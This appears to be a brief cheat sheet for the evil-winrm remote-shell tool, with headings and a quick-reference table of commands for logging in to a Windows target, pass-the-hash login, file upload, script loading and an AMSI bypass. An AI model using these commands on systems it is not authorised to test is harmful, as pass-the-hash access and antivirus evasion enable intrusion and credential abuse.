Connect
With SSL (Port 5986)
File Transfer
Load PowerShell Scripts
Load Binaries
Menu & Features
With Kerberos Ticket
Quick Reference
| Task | Command |
|---|---|
| Login | evil-winrm -i TARGET -u user -p pass |
| PtH | evil-winrm -i TARGET -u user -H HASH |
| Upload | upload /local/file C:\remote\path |
| Scripts | -s /path/ then Script.ps1 in shell |
| AMSI bypass | Bypass-4MSI |